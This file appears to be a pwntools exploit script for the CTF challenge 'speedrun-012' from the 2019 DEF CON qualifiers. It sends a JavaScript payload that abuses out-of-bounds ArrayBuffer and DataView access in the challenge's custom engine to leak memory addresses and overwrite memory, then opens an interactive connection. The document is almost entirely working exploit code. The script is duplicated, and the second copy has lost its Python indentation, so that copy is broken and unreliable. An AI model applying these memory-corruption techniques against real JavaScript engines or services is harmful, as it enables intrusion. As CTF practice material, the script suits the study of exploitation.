ducphanduyagentp/exp.py

## exp.py
#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug')  # output verbose log

RHOST = "speedrun-012.quals2019.oooverflow.io"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337

def section_addr(name, elf=elf):
    return elf.get_section_by_name(name).header['sh_addr']

def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./speedrun-012'], gdbscript=gdbscript)
else:
    conn = process(['./speedrun-012'])
    # conn = process(['./speedrun-012'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

payload = 'var buffer = new OOOArrayBufferOOO(16);'
payload += 'var oob = new OOOArrayBufferOOO(0x8); var oob8 = new DataView(oob);'
payload += 'oob8.setUint8(0, 0xde); oob8.setUint8(1, 0xad);'
payload += 'var view = new DataView(buffer);'
payload += 'view.setUint32(0x8e80, 0x1adbeef);'
payload += 'view.setUint32(0x8e84, 0x1adbeef);'
payload += 'view.setUint32(0x8e98, 0x1adbeef);'
payload += 'var leak_l = oob8.getUint8(0x1bf0) + (oob8.getUint8(0x1bf1) << 8) + (oob8.getUint8(0x1bf2) << 16) + (oob8.getUint8(0x1bf3) << 24) + 0x1bd8;'
payload += 'var leak_h = (oob8.getUint8(0x1bf4) ) + (oob8.getUint8(0x1bf5) << 8);'
payload += 'var l = ((leak_l & 0xff) << 24) + ( ((leak_l & 0xff00)>>8) << 16) + (((leak_l & 0xff0000)>>16) << 8 ) + ((leak_l & 0xff000000) >> 24) ;'
payload += 'var h = ((leak_h & 0xff) << 24) + ( ((leak_h & 0xff00)>>8) << 16) ;'
payload += 'if (leak_l < 0) { l += 0x100};'
payload += 'oob8.setUint32(0x100, l);'
payload += 'oob8.setUint32(0x104, h);'
payload += 'var x = new OOOUint32ArrayOOO([h, l-0x55e53a00]);'
payload += 'var y = (new OOOFloat64ArrayOOO(x.buffer))[0];'
payload += 'var q = new OOOArrayBufferOOO(0xf0); '
payload += 'var p = new OOOArrayBufferOOO(0xf0); '
payload += 'var l = new DataView(p);'
payload += 'l.setFloat64(0x50, y);'
conn.sendline(payload)

conn.interactive()
	#!/usr/bin/env python
	from pwn import *

	context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
	# context(terminal=['tmux', 'new-window']) # open new window

	# libc = ELF('')
	elf = ELF('./speedrun-012')
	context(os='linux', arch=elf.arch)
	context(log_level='debug') # output verbose log

	RHOST = "speedrun-012.quals2019.oooverflow.io"
	RPORT = 31337
	LHOST = "127.0.0.1"
	LPORT = 31337

	def section_addr(name, elf=elf):
	return elf.get_section_by_name(name).header['sh_addr']

	def dbg(ss):
	log.info("%s: 0x%x" % (ss, eval(ss)))

	conn = None
	opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
	if opt in 'rl':
	conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
	elif opt == 'd':
	gdbscript = """

	continue
	""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
	conn = gdb.debug(['./speedrun-012'], gdbscript=gdbscript)
	else:
	conn = process(['./speedrun-012'])
	# conn = process(['./speedrun-012'], env={'LD_PRELOAD': ''})
	if opt == 'a': gdb.attach(conn)

	# exploit
	log.info('Pwning')

	payload = 'var buffer = new OOOArrayBufferOOO(16);'
	payload += 'var oob = new OOOArrayBufferOOO(0x8); var oob8 = new DataView(oob);'
	payload += 'oob8.setUint8(0, 0xde); oob8.setUint8(1, 0xad);'
	payload += 'var view = new DataView(buffer);'
	payload += 'view.setUint32(0x8e80, 0x1adbeef);'
	payload += 'view.setUint32(0x8e84, 0x1adbeef);'
	payload += 'view.setUint32(0x8e98, 0x1adbeef);'
	payload += 'var leak_l = oob8.getUint8(0x1bf0) + (oob8.getUint8(0x1bf1) << 8) + (oob8.getUint8(0x1bf2) << 16) + (oob8.getUint8(0x1bf3) << 24) + 0x1bd8;'
	payload += 'var leak_h = (oob8.getUint8(0x1bf4) ) + (oob8.getUint8(0x1bf5) << 8);'
	payload += 'var l = ((leak_l & 0xff) << 24) + ( ((leak_l & 0xff00)>>8) << 16) + (((leak_l & 0xff0000)>>16) << 8 ) + ((leak_l & 0xff000000) >> 24) ;'
	payload += 'var h = ((leak_h & 0xff) << 24) + ( ((leak_h & 0xff00)>>8) << 16) ;'
	payload += 'if (leak_l < 0) { l += 0x100};'
	payload += 'oob8.setUint32(0x100, l);'
	payload += 'oob8.setUint32(0x104, h);'
	payload += 'var x = new OOOUint32ArrayOOO([h, l-0x55e53a00]);'
	payload += 'var y = (new OOOFloat64ArrayOOO(x.buffer))[0];'
	payload += 'var q = new OOOArrayBufferOOO(0xf0); '
	payload += 'var p = new OOOArrayBufferOOO(0xf0); '
	payload += 'var l = new DataView(p);'
	payload += 'l.setFloat64(0x50, y);'
	conn.sendline(payload)

	conn.interactive()